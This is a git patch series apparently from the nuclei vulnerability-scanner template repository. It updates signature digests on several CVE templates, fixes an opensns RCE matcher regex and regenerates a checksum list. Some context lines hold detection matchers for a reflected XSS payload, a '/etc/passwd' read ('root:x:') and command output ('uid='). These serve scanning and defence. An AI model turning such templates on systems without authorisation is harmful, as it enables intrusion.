1b1d0864ab..459f1a577c 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7987354e025dbc03f2e1afa23c2973af3ef684babd4e5fd110f4a90f06083ab022100fb410f784e3b4a10502077ab8b122e04039b29dea9df90707725691983bfe80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072033feeeb4826d2bee7c874213d2df871af8bf13afc1f3c980f299181f16f62022029ff80065f468b347cdf1c0833940b14cb59adce81580ba0ae7e1771cef64f17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index dc989fce6e..b24121f056 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -38,4 +38,4 @@ http: - 'status_code == 200' - 'contains(body, "um-debug<br/>")' condition: and -# digest: 4a0a0047304502200273cf6345bda7ae0f53bba3ecd04ff070ee62c82b146898fc2a612f9363f6d602210087a74005c7a282fc34b4d12bdbe7fe68c141019e1ab85581d000d319aeff2fd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbb0583fe89fcebeeb2230544ab50b45edc164b04b429997fe398e1f6cfb1670022100a8e7242f47dbf36e5d828171cd525c4c7c76ce5e97ad9fefa5f9f3e5c77cab50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index ae77343cca..c7cf477b96 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -47,4 +47,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "<script>alert(document.domain)</script>", "SOPlanning")' condition: and -# digest: 4a0a00473045022100b2ba794854d39f477eba7ecc4a2ef4a49c3994da43c6768fa8b7833d9ff576a8022036b5166302b1717b96a5fbae6062df8b924ee738794571eae1eb2fe2aa69dc55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6bc5b2793ecbad05e108bd81bbd41b4b22e58e61837998f0f6a2aacb1af3dff02203c428c70431c5b3c1cbc7ca7641dac68dab0d4cd1b99ea4023ac9950ec713dee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3400.yaml b/http/cves/2024/CVE-2024-3400.yaml index 4582984158..5b916b447f 100644 --- a/http/cves/2024/CVE-2024-3400.yaml +++ b/http/cves/2024/CVE-2024-3400.yaml @@ -54,4 +54,4 @@ http: - status_code_1 == 404 && status_code_3 == 403 - contains(body_2, 'invalid required input parameters') condition: and -# digest: 4a0a00473045022100a1480b0b832bef7655fb52c49ae84122e9cabdf34c766e029002770e55073ba302200f1affd9a0d6cae40b943d774c8aee1af443981c4240f9ed87422a732fd69130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097e7c06d535f21e4ee301a8bf020f8f4a5a6667b450ceb48d188567cc43459210220349129284fd3663abeb841c36f44ecd03d773aa19eb89af9da6cfc82792d49cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index f1cc825297..d821c13c56 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -122,4 +122,4 @@ http: part: body words: - "root:x:" -# digest: 490a00463044022034365345ca960cac174d54cf353f25ea720b065bf9bd3d8e354696368908c0b702203f998746363311340e85f3d692227a4c849f84ebe03837ea3004486821b6e19c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022016f9960caefebe9812cebc8ea4a19c3818eca4e22ee5d653c3c651cb21120fae022100abc41e3e04f0659ca3c47dfff8554f225c6019f4541021d02307c5fc01c1ecf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index 3db7899504..b4e1655549 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204d3f2a0f97eb7ea7fe180e934519026ed231f12223669f51926597f7209ee4a402201edf5e99628b2435af3325bf2f7cac5db876ef8960118f25a1b0cbe87998d6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a145e39458a5bafa9946a183c0148736e45daf0ec28820e8c442fb5684d901a102206a30ac5570efedae5b2847a92e5cfad3a5d1cfd71dfc2ad82563d2e57ec9dbd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4c1a802a8babfc7399d30153117725f5015f17eb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 1 Jun 2024 14:28:57 +0530 Subject: [PATCH 1643/1768] Fix FP opensns-rce.yaml --- http/vulnerabilities/other/opensns-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/opensns-rce.yaml b/http/vulnerabilities/other/opensns-rce.yaml index 04d60d8bd2..24fa77d4b2 100644 --- a/http/vulnerabilities/other/opensns-rce.yaml +++ b/http/vulnerabilities/other/opensns-rce.yaml @@ -25,7 +25,7 @@ http: - type: regex part: body regex: - - "((u|g)id=)" + - "uid=([0-9(a-z)]+)" - "Microsoft Windows" condition: or From 3e42ca0e6b06eb414f79f1ea1e5e9069a46c58ee Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 09:05:35 +0000 Subject: [PATCH 1644/1768] Auto Generated Templates Checksum [Sat Jun 1 09:05:35 UTC 2024] :robot: --- templates-checksum.txt | 3632 ++++++++++++++++++++-------------------- 1 file changed, 1816 insertions(+), 1816 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5245076309..22cfdb7e6a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -894,2426 +894,2426 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:ce532c48b5e65624cefb884818 http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:24e33df8f32dc3625dd9ae3f8e98055a47dfeedd http/credential-stuffing/self-hosted/grafana-login-check.yaml:0b82037ff4e9c72df81aa93d7c7f5c745866c664 http/credential-stuffing/self-hosted/jira-login-check.yaml:968e46885f51c77a83c0698e59e96c37b37ea8b8 -http/cves/2000/CVE-2000-0114.yaml:cde077e4cc4205ac3e06b13137f1882f457a3231 -http/cves/2001/CVE-2001-0537.yaml:fbfbd1e2d066d791fe2a6676ff00e50e85265fbc -http/cves/2002/CVE-2002-1131.yaml:a3c7f79b103646e11a8da3cf2a22094452e459a3 +http/cves/2000/CVE-2000-0114.yaml:ebdf6c20a94e575096700e3a5a2bcb88c9995708 +http/cves/2001/CVE-2001-0537.yaml:e43dc67ef6870c9cffcb40b31631f7cd128b4e9f +http/cves/2002/CVE-2002-1131.yaml:be017258958ebe468f86e0f0d1a2500fd26ae77e http/cves/2004/CVE-2004-0519.yaml:7968af9d55ad3d7db45d4978c04830f4b81a26ed -http/cves/2004/CVE-2004-1965.yaml:5da4f328bccbc13de52a9cda87bb775aaea45595 +http/cves/2004/CVE-2004-1965.yaml:1f20050eb605b78c6c0307155707e90d3c3a5cd5 http/cves/2005/CVE-2005-2428.yaml:014d3a09f56e144c520b80336166df118252095d -http/cves/2005/CVE-2005-3344.yaml:fb49ecd39f4b35179e4c70e42dbfe1fe66621b78 -http/cves/2005/CVE-2005-3634.yaml:fb7899762957cac6b841ca1ab13e38e8607989d8 +http/cves/2005/CVE-2005-3344.yaml:54a7b30968e8eff300d74083651ac78ba54a6b61 +http/cves/2005/CVE-2005-3634.yaml:f64b8d12db340de3b554370d43c4ac36123ad73e http/cves/2005/CVE-2005-4385.yaml:20057d0cba302dc1bad5953124947e0267033c89 http/cves/2006/CVE-2006-1681.yaml:3dab8b5c90252f5c915312e7ad02426c2d60f98f -http/cves/2006/CVE-2006-2842.yaml:79af29153d57a8ab320e48e514308b5969d50793 -http/cves/2007/CVE-2007-0885.yaml:efbc944aa9eb01d384f65a4006bafb08434a249f -http/cves/2007/CVE-2007-3010.yaml:c5b1830593514312a48ab6f5b6bd184fda184644 -http/cves/2007/CVE-2007-4504.yaml:709bbb828ede5998c8222d8f5f25bfec65de3629 -http/cves/2007/CVE-2007-4556.yaml:47f15309aea6f64a71100bdcac276fd7b60a5a1c -http/cves/2007/CVE-2007-5728.yaml:694fbdd17183242f9d3bc3ef45c6d912d363fe32 +http/cves/2006/CVE-2006-2842.yaml:7d75e13cd3030dbbb90b65d37f4958dc32d7945a +http/cves/2007/CVE-2007-0885.yaml:2bc9559f910da5a0f99cf4412fe56ab526bdb039 +http/cves/2007/CVE-2007-3010.yaml:54985bb083d5dc7ff5ee07783055c8b3e0fc4671 +http/cves/2007/CVE-2007-4504.yaml:09f70f7c4bd05d9a2f38874308b2b97a0f22547b +http/cves/2007/CVE-2007-4556.yaml:74d58c6684bd7085f1b675e0fdb910c9bf5f45c9 +http/cves/2007/CVE-2007-5728.yaml:5a78fc32243b74fcc77e3bb6d6949c9d93613ee8 http/cves/2008/CVE-2008-1059.yaml:a6e88a29e1382a7a92d2465b513ffd1223d870b9 -http/cves/2008/CVE-2008-1061.yaml:cc5934daa30075510da0ff11325518ae3f17f298 -http/cves/2008/CVE-2008-1547.yaml:dc4f20c357b0117d721a81265352ba6fda6261d1 +http/cves/2008/CVE-2008-1061.yaml:4c857ca420e45320722618ca7441c47710baac67 +http/cves/2008/CVE-2008-1547.yaml:aa5fbd3a9c8e154c2961e798b1e2a7e676b1b80b http/cves/2008/CVE-2008-2398.yaml:f5c4cb5d6dafa0a882eae29c89bb6a3982ba69a4 -http/cves/2008/CVE-2008-2650.yaml:d53dd7bfee4c739dda510e5ee2eb613dc697cba3 +http/cves/2008/CVE-2008-2650.yaml:855fa8c9bcca0355512690ec9869315ac1096d81 http/cves/2008/CVE-2008-4668.yaml:dd5527612e924d9a59ac3c58c998cacc8e70441c -http/cves/2008/CVE-2008-4764.yaml:63ba6b935c0bc87ae3438339221d4abf72d7a40f -http/cves/2008/CVE-2008-5587.yaml:c969a2f642a97ab738fb778c8cb11abf2f2d35be -http/cves/2008/CVE-2008-6080.yaml:34bc601e2cae9ecfc1d3f364787e95cc3025847b -http/cves/2008/CVE-2008-6172.yaml:c4f0f39106b0ec3b7ee708f17269d7b119486ea4 -http/cves/2008/CVE-2008-6222.yaml:48c6332172c9f3e7108ae6845e1c7a62d702281e -http/cves/2008/CVE-2008-6465.yaml:f2b2f886234800bb98db1ab9c3838867de620f3f -http/cves/2008/CVE-2008-6668.yaml:5db9e940887500dacc04bd5d9e64b078cf83e2fc +http/cves/2008/CVE-2008-4764.yaml:b61a8db01efa92c650b4605cabcf023653e9f153 +http/cves/2008/CVE-2008-5587.yaml:b8c1f9c0b62c60dc47344371249cdd346ab6fe33 +http/cves/2008/CVE-2008-6080.yaml:4d19f123f5d5b550ed9a60f9115032044bd3e508 +http/cves/2008/CVE-2008-6172.yaml:1b69d725cbe082350970da03b78cb1ab9616ae6f +http/cves/2008/CVE-2008-6222.yaml:49c094908bc759b30d38a2239f3f7a6cad5d51cb +http/cves/2008/CVE-2008-6465.yaml:ee456b5fe4464d4f0ebf0caad6ffe86c64d02f75 +http/cves/2008/CVE-2008-6668.yaml:9a26a2081b16686c196e3d556cd05fe9a39373d9 http/cves/2008/CVE-2008-6982.yaml:ec7e061e851cd73e256f6cc2b73658bf631d9bc2 -http/cves/2008/CVE-2008-7269.yaml:74a76cbd660b63a451ad28b5c6e499d603951fcd +http/cves/2008/CVE-2008-7269.yaml:99d96962951649254ec5aa0c310c1123f8bdb4bb http/cves/2009/CVE-2009-0347.yaml:5ce90e313f49f7c658c8208dc28b030f6ad68263 -http/cves/2009/CVE-2009-0545.yaml:b4854e41056f1f4f88bfdd1599ee38b8701fa0ac -http/cves/2009/CVE-2009-0932.yaml:cd229881a65cca2a507a2f19b7bd7040b7e6f3ac -http/cves/2009/CVE-2009-1151.yaml:fbb8a9780edd67f308652e8ca20f2e049753a369 +http/cves/2009/CVE-2009-0545.yaml:c7f9ecbf2085e123b198011f3fd387506a9e8a71 +http/cves/2009/CVE-2009-0932.yaml:6a85d3af6796f5e3dab7010769ac762444039fc1 +http/cves/2009/CVE-2009-1151.yaml:8dc096e55a97d8b7b97d856fa96e90726da5e66d http/cves/2009/CVE-2009-1496.yaml:3b7fd77b1a4aa689f73d36ecdb6b3e5fa5ad4367 http/cves/2009/CVE-2009-1558.yaml:7311f5b1b9a9fe041ce4ffbd34daf2e6fe0e7538 -http/cves/2009/CVE-2009-1872.yaml:394ba582c49eeda94980cd622fa95b3c7beefad3 +http/cves/2009/CVE-2009-1872.yaml:8657a5749e8a88ae4ba56e5b0b19c3464a6ae7b2 http/cves/2009/CVE-2009-2015.yaml:4694ca53378e410392946e729b2526d1220db192 -http/cves/2009/CVE-2009-2100.yaml:b1fed3abb29407f88d6faee5eba8919065b58874 +http/cves/2009/CVE-2009-2100.yaml:6bbdf6cca928b966076b4cddbd0668eef5331e0a http/cves/2009/CVE-2009-3053.yaml:68a597a8292c709a6f9490f4ff1fc4e75c1ef815 -http/cves/2009/CVE-2009-3318.yaml:974fd4cc88e3f89735bafc6002390f5951f84c75 -http/cves/2009/CVE-2009-4202.yaml:794900a596204e22965ff4ca20cb2c5281288aac -http/cves/2009/CVE-2009-4223.yaml:a8a1c50ee7caece6f3a124b4f9fcbcbfca624f3d +http/cves/2009/CVE-2009-3318.yaml:9ff69197adddbece5877c66bf06b8db0dc809919 +http/cves/2009/CVE-2009-4202.yaml:6bb8aa9ffd8f9764e6ed8c1a0558cde6ed7029a7 +http/cves/2009/CVE-2009-4223.yaml:a58ac563ac596712f2eaec11206e976d07406757 http/cves/2009/CVE-2009-4679.yaml:6fc53e452071d62d54f1e77aeb36669cdab21df2 -http/cves/2009/CVE-2009-5020.yaml:85051897dc73a81c97e10972db632f719a4918ee +http/cves/2009/CVE-2009-5020.yaml:bd0ef8373deacb3918d2a779286f03003f4db49f http/cves/2009/CVE-2009-5114.yaml:eed033fbf16521f4aba9fe6fddbef642c202a00b -http/cves/2010/CVE-2010-0157.yaml:ddef4fd4d27ec89abf52e89afd1238ebd8a9e8ac -http/cves/2010/CVE-2010-0219.yaml:97add297545c388a3f87790ff2daeaba38a84d08 -http/cves/2010/CVE-2010-0467.yaml:cbfe420f6148c4e7ec69d81ef7f9dccdaa2b8fd4 +http/cves/2010/CVE-2010-0157.yaml:950e30b71bb923174f57682b4022772c34d0cf03 +http/cves/2010/CVE-2010-0219.yaml:c02b48de176640720fb49210c96677b7dc75ab9c +http/cves/2010/CVE-2010-0467.yaml:2a28c465b90430beaa770b63044d2bc00ca7bbc1 http/cves/2010/CVE-2010-0696.yaml:73259ec73f220808622802ae226874d03de4a439 -http/cves/2010/CVE-2010-0759.yaml:d4efd62acda03f88acdff771a23e105c57da5620 -http/cves/2010/CVE-2010-0942.yaml:c2153bdc250c5cd2ce90325ce50096ad8b6521e1 +http/cves/2010/CVE-2010-0759.yaml:30831ecff561e842b6f472ea7cbb1ba54b85fa69 +http/cves/2010/CVE-2010-0942.yaml:f5cbdd272685133623fd425e6d33e0fb1733e3d4 http/cves/2010/CVE-2010-0943.yaml:d1fe9d2b4e08d5ea81e894c03d11b7bcbdb73bb3 http/cves/2010/CVE-2010-0944.yaml:bfaf0faec2899ff4a64cb1a41b4229d73fbfd6a6 -http/cves/2010/CVE-2010-0972.yaml:ddeb56e99bae15412ee93ee1cca6c3f43f2abba3 +http/cves/2010/CVE-2010-0972.yaml:e47087f278696e7b0e8904840e7d224727b6bf88 http/cves/2010/CVE-2010-0982.yaml:599bb1fb381fde5c20d5bcbcce1d55ba75512a52 http/cves/2010/CVE-2010-0985.yaml:ea6f8ee446653031d0a1f2ee0295e337a7f115d8 http/cves/2010/CVE-2010-1056.yaml:900582497ec305ba4fca6320cfc58b4975b3d751 -http/cves/2010/CVE-2010-1081.yaml:a9e63d0147ea276e4ef9b2fc035a96af99dac28f +http/cves/2010/CVE-2010-1081.yaml:d461a69be5c5267870cc70fad2dcca1339693f1c http/cves/2010/CVE-2010-1217.yaml:65a2add18d495fa4aee30dc5d70bb31a6fc9a437 http/cves/2010/CVE-2010-1219.yaml:f22b61d9fdc94d2e0611638f8adc881eee8481a9 http/cves/2010/CVE-2010-1302.yaml:6ad059078eeb8d7f3bfd2aec5e71cdd7ae6f3891 http/cves/2010/CVE-2010-1304.yaml:727f1f1679c1f1973b09e11ad131f2cbb15e7dea -http/cves/2010/CVE-2010-1305.yaml:2472be1c930d25b8ef09c04e9c0076ebdb6d3afe -http/cves/2010/CVE-2010-1306.yaml:302da19a1fa904a48cc109489628bcf1e3cb8721 -http/cves/2010/CVE-2010-1307.yaml:02c9440193acd85e94668ffbee5575c39f8483c7 -http/cves/2010/CVE-2010-1308.yaml:9f7f075061788b48cbf34a6bba23db64c2d2b45c -http/cves/2010/CVE-2010-1312.yaml:e060422c65a7d67a4e5bc1ea24c2a132fb2ffae6 -http/cves/2010/CVE-2010-1313.yaml:83220cba68d0bd8f0cb7400811a70ce5d08d70a2 +http/cves/2010/CVE-2010-1305.yaml:67a2a340abb039bb80a8d0fdae26e297af4fefef +http/cves/2010/CVE-2010-1306.yaml:86d5a2bea958b088e3346ed30aaa630b371e2edd +http/cves/2010/CVE-2010-1307.yaml:e11765da3157952bceebc8445909ceee612f9279 +http/cves/2010/CVE-2010-1308.yaml:7943dd6eab9e9df47150a03c293f9ebee95d49a8 +http/cves/2010/CVE-2010-1312.yaml:9fd9f03506ee1c8d65629ad0f4dabd7d02ba961f +http/cves/2010/CVE-2010-1313.yaml:15714bc34418e04e71c90da73b5ad0cde2f7fd86 http/cves/2010/CVE-2010-1314.yaml:e68e08b08120bd8612c9376f8b4a8f4562aa76ee http/cves/2010/CVE-2010-1315.yaml:8ae5fb46079488101b9c5e99a775d0f97dc98883 http/cves/2010/CVE-2010-1340.yaml:0c5648a4d0daa4d1915c4403fe656fa83bcc1ccd http/cves/2010/CVE-2010-1345.yaml:4e2d3d3329776cf5b14080ac31bee840bdd22646 http/cves/2010/CVE-2010-1352.yaml:0f001c6956c9fc5d200417b838d6a39fc23e353d -http/cves/2010/CVE-2010-1353.yaml:3e4b4d4ed60e0e4cab2c21797d8ae9884540408d -http/cves/2010/CVE-2010-1354.yaml:a8e32d056c74334fc86f716aa7a50515618fdf94 -http/cves/2010/CVE-2010-1429.yaml:36032d4688e465e068d6acb3916cbe87d982d72d -http/cves/2010/CVE-2010-1461.yaml:66ff1d52ed49414279f38a9ef66e21397033c681 -http/cves/2010/CVE-2010-1469.yaml:c4496478b863beaf50ec065b2d7251449346eadd +http/cves/2010/CVE-2010-1353.yaml:4481e610c4ae85c49bdb915f28cb73819042279e +http/cves/2010/CVE-2010-1354.yaml:dfd813c316d91c3f5020de9ce109a13e0c2c545e +http/cves/2010/CVE-2010-1429.yaml:38150df0a318c623b9f957bd48eb79149cda4be7 +http/cves/2010/CVE-2010-1461.yaml:22ff8d954f8aefe76461ec1bb45a5afae27f419d +http/cves/2010/CVE-2010-1469.yaml:184ebde7e35095d2bb953c855dc1ac36f1c45ab0 http/cves/2010/CVE-2010-1470.yaml:425cbc7cf9331292bc877c74171918b9b26233ed -http/cves/2010/CVE-2010-1471.yaml:5933d9fc11464aff303d9e3a6026416f3e893e9e +http/cves/2010/CVE-2010-1471.yaml:e9767437cfdb3112ee0af90b66a151b7ac488f72 http/cves/2010/CVE-2010-1472.yaml:05efa0d65dfd726f7800598f8a7d6f69bdf2ac28 -http/cves/2010/CVE-2010-1473.yaml:e322a26eadc2fc402fb215602159fea2821345bb -http/cves/2010/CVE-2010-1474.yaml:d5770393c9bf13d7b60aec65acaab2417ad19e63 +http/cves/2010/CVE-2010-1473.yaml:1a884946a3b1c4d2f21358885422c76e1c546bb2 +http/cves/2010/CVE-2010-1474.yaml:08e6e6d4a21096f7d84d3fcc7b50a77767577217 http/cves/2010/CVE-2010-1475.yaml:ba1533465a3c2032e7bbe8babc2aa2e33279217a -http/cves/2010/CVE-2010-1476.yaml:cb4315adfa0bde7ffd51d2a3e6de28bb6c11ec21 +http/cves/2010/CVE-2010-1476.yaml:7890f7de322b9e0b96d7eb965cd4bdf8e7facc0e http/cves/2010/CVE-2010-1478.yaml:30788df9e30a86e49a95dbe857ba7d6f88895b35 http/cves/2010/CVE-2010-1491.yaml:81c825592c5b5b85645945be1cd9d88c4f88df9d -http/cves/2010/CVE-2010-1494.yaml:28b3a504c10ea35e84a8e5ab55d46b96d1068ed2 +http/cves/2010/CVE-2010-1494.yaml:8b520da8bf3985db0e217c289d806ce5fd9a2d50 http/cves/2010/CVE-2010-1495.yaml:fd08efd24fe096d136458eebabaf285744e07e0a http/cves/2010/CVE-2010-1531.yaml:37431ef4763a68b3568e8a486d81cf5e1643d80a -http/cves/2010/CVE-2010-1532.yaml:438cdd173e4a31325ea27aea246aab2c4c34c14e -http/cves/2010/CVE-2010-1533.yaml:cbc6ad1e85e13bc8cb630ab2c364643d413fa0af -http/cves/2010/CVE-2010-1534.yaml:03dbcea8eaffe21f469180d5993ee5afbdbacfa7 -http/cves/2010/CVE-2010-1535.yaml:80d65e19fc2ed303d5cc8adb820232f44893202b +http/cves/2010/CVE-2010-1532.yaml:81da2999d656843c4f582b4295651a7ef0ba7dd7 +http/cves/2010/CVE-2010-1533.yaml:743b6a096195b8ea287119bfd574136648f1d711 +http/cves/2010/CVE-2010-1534.yaml:e56bd300d4e208ef033a7a9c0d85c99c441890e3 +http/cves/2010/CVE-2010-1535.yaml:5decf50fd0a035aebb67f4bbb938af0d6a7ca136 http/cves/2010/CVE-2010-1540.yaml:eaf66df28d06a8f26b2c99f262d92b1340a42b16 http/cves/2010/CVE-2010-1586.yaml:d58c94874f5a6501a136f572f673c8b805d8ae9b http/cves/2010/CVE-2010-1601.yaml:b4aafeb36e3e33aeb3edd3b955b4953db25705ea -http/cves/2010/CVE-2010-1602.yaml:cca603ccbfdc146605d757fabdf6a1aa6e37cfed +http/cves/2010/CVE-2010-1602.yaml:0bf601a88a5f2213c172f4ff817e3bd2dc9e446d http/cves/2010/CVE-2010-1603.yaml:b6188b9d88e5d2351979796ebb3270d3fde53be9 -http/cves/2010/CVE-2010-1607.yaml:220efc2f1c0b9f145d04ec1cc0efc479157838d7 -http/cves/2010/CVE-2010-1653.yaml:6750c406d14955dd9e2c8feeb78178f3f0076547 -http/cves/2010/CVE-2010-1657.yaml:73d665d3d27f4bf152014ec82f56028e16f16abf +http/cves/2010/CVE-2010-1607.yaml:383a5834d2af2c9e953b6656a676cc5fb5bd86ca +http/cves/2010/CVE-2010-1653.yaml:461aca038a9faf55b9e4ad7c5cb8b24523f13246 +http/cves/2010/CVE-2010-1657.yaml:f3040ebeda1902bdd736bebc84c3134525692228 http/cves/2010/CVE-2010-1658.yaml:7822fc55851a3db8a17932d981cd1249270a1fcd -http/cves/2010/CVE-2010-1659.yaml:f6b62072548aa907fa67787167cbb82d9d763324 +http/cves/2010/CVE-2010-1659.yaml:1f39675facb5774046bbef8b06b5899ab2ac18a0 http/cves/2010/CVE-2010-1714.yaml:b9fc204e8b85ee36b0f15a8da385448b2dd2fbce -http/cves/2010/CVE-2010-1715.yaml:daed63a42610d953dad924ab3139fcc62044d756 +http/cves/2010/CVE-2010-1715.yaml:53074615708c1c4f6bf5049cf5447affe828465b http/cves/2010/CVE-2010-1717.yaml:ccf1a65be89b0c388cc9f71c28d0d6b51a17b743 -http/cves/2010/CVE-2010-1718.yaml:aa32181a904283d0e32744973e5b8be429273193 +http/cves/2010/CVE-2010-1718.yaml:df1c72fc97a5e4c4301b15df30b2dd19957dbc63 http/cves/2010/CVE-2010-1719.yaml:81f15e4304779eb24cba200b01099889e5140a74 http/cves/2010/CVE-2010-1722.yaml:75137a1adbb8ebcbb47642b983d93983a3f276c9 -http/cves/2010/CVE-2010-1723.yaml:45f2313b13af972e214edd03a86ef58149328b1a +http/cves/2010/CVE-2010-1723.yaml:8b54bddf0e5f6757d1ce9cba44a93386e8ef4632 http/cves/2010/CVE-2010-1858.yaml:47fdeb1cfc6c33db3a6fbc3b6f841e5738c5524d -http/cves/2010/CVE-2010-1870.yaml:321316a994f71a408dc53de7fbc83f07b47c3714 +http/cves/2010/CVE-2010-1870.yaml:bb2835745b04eecff40eac1bcbd77c04e2412723 http/cves/2010/CVE-2010-1875.yaml:153037344f618b22315b5cb6c764f56e6020e115 http/cves/2010/CVE-2010-1878.yaml:e376a84dae26f6d3b0cce191c22e273523736ed2 -http/cves/2010/CVE-2010-1952.yaml:4e23bfee74560418ea78ed1fa6bbd3d164d86e14 -http/cves/2010/CVE-2010-1953.yaml:92593bf4c6168db596ce32760588f97b76add554 +http/cves/2010/CVE-2010-1952.yaml:4c2889583512c97a6a66ec527acc778d77792240 +http/cves/2010/CVE-2010-1953.yaml:e091d239b1ef9ceb20ba5d9338cbf5238491d9e6 http/cves/2010/CVE-2010-1954.yaml:7935cf23b4feb5d1cd7668642ff36fa87c41a759 -http/cves/2010/CVE-2010-1955.yaml:cee09885c3fe1dea578218c5b63469f2fd3cd905 -http/cves/2010/CVE-2010-1956.yaml:9cae094ac7f90ea7c74afd1ac7f6ca72cb26ad44 -http/cves/2010/CVE-2010-1957.yaml:f3d0975a0cd41bcbdc55fc95cad0f3a92a7b05c6 -http/cves/2010/CVE-2010-1977.yaml:323af1f37f4bafc02c35680b3b5f25c65dc1012e +http/cves/2010/CVE-2010-1955.yaml:dcb874bcdba0efeb430975f8cd5127b6815f60ae +http/cves/2010/CVE-2010-1956.yaml:01b13cc909f5f201ac8ef4e1c883ecddf8cb3615 +http/cves/2010/CVE-2010-1957.yaml:cd4b276eb4b4fa3cbd962409f2a6d9e3d23cb8d6 +http/cves/2010/CVE-2010-1977.yaml:45955fdad4bd60abfa0939a1f7ad6d64243f70d1 http/cves/2010/CVE-2010-1979.yaml:0ddddf83b9d40873443db4a31de2ebedbdc1a8bc http/cves/2010/CVE-2010-1980.yaml:d46da5ed40593b05c99310de3c3cf02b596f785c http/cves/2010/CVE-2010-1981.yaml:b1c467846895e76100a2ce986bbd364c7ef11875 -http/cves/2010/CVE-2010-1982.yaml:ba5aa35d9543a73569b8db46278243d8b818463b +http/cves/2010/CVE-2010-1982.yaml:55fa02576aa3ae20a65183ca3186069fa806d6f8 http/cves/2010/CVE-2010-1983.yaml:d8d03db95a52020abedb493b3f4cd0050c166b3b http/cves/2010/CVE-2010-2033.yaml:6897fa1eb808a4ad1dd8f1980c3128050da1a9c6 http/cves/2010/CVE-2010-2034.yaml:ed205dcf43b360b3b9380b59380607610c6db446 http/cves/2010/CVE-2010-2035.yaml:343a15271ba30a258277c2d62a2ac0b32eae4a7a -http/cves/2010/CVE-2010-2036.yaml:987ff41eb17287615f545e61109562af0e4e11ac -http/cves/2010/CVE-2010-2037.yaml:9cb8477ccf1880daf9122b815722304234537b39 +http/cves/2010/CVE-2010-2036.yaml:e15f376a2171fd2d2e55e99907cf7fe74244551c +http/cves/2010/CVE-2010-2037.yaml:7bfb032acaab69c6117c5d8facda6543281db3d5 http/cves/2010/CVE-2010-2045.yaml:da2b1830c10d0a89cc941fe7c6b0eec0164efe12 -http/cves/2010/CVE-2010-2050.yaml:0769276e076f4cfd3fa7d1a3ff7ceaa339828ca6 +http/cves/2010/CVE-2010-2050.yaml:2c65bfd5b4066f7e9ca8c0c4f38395a301d466c5 http/cves/2010/CVE-2010-2122.yaml:3e2a4991e90707a57e0770920aa0f55a12b5efc5 http/cves/2010/CVE-2010-2128.yaml:7e08cbdba6e319549864dcd168316626d1fec1a5 http/cves/2010/CVE-2010-2259.yaml:7ee9cb7d015a35ae5db7d2b21dc21eee66b1335f http/cves/2010/CVE-2010-2307.yaml:974a029d715d0b35c48ae0152129a4eb67bc72c5 -http/cves/2010/CVE-2010-2507.yaml:374cf4047e37632490fbdfc825fce2eb1b5c7e58 -http/cves/2010/CVE-2010-2680.yaml:8a3e803dff818279452703ce45b1ceb5b0d7a328 +http/cves/2010/CVE-2010-2507.yaml:a7d4c681213119f3c275846d077e817bef44d5e6 +http/cves/2010/CVE-2010-2680.yaml:abbf84831ad4ea9ed18e4185380d214afbfbde14 http/cves/2010/CVE-2010-2682.yaml:55d668ece64b7ec7b966b2979e89092420f94fa2 http/cves/2010/CVE-2010-2857.yaml:2e5ec92cf7a36d86f01ff057ec26939b1877a8d5 -http/cves/2010/CVE-2010-2861.yaml:649c467d63ee9eeb2a84cd5c4be98baf86ccaf27 -http/cves/2010/CVE-2010-2918.yaml:0d785499476f3aba502f9a5d40039f9d38d01330 +http/cves/2010/CVE-2010-2861.yaml:0f5d97f78cc1f78be327bf9b67668b5146a04aa3 +http/cves/2010/CVE-2010-2918.yaml:fdd7c2962f11d92aefd3a974869c53ed44400ebf http/cves/2010/CVE-2010-2920.yaml:f32fc44594b039fd382f339f9ac42d0d9858a60b -http/cves/2010/CVE-2010-3203.yaml:e9aafd881e5ed1c311f7960188aaade5eff50e12 +http/cves/2010/CVE-2010-3203.yaml:000a8f0c4dcf829e67fe60c966debd95143f899f http/cves/2010/CVE-2010-3426.yaml:8fbd7d692e79dc4e64334f330432896ca80e1e8a -http/cves/2010/CVE-2010-4231.yaml:51bdd2463b062dd515ebd1cd667897d559732db7 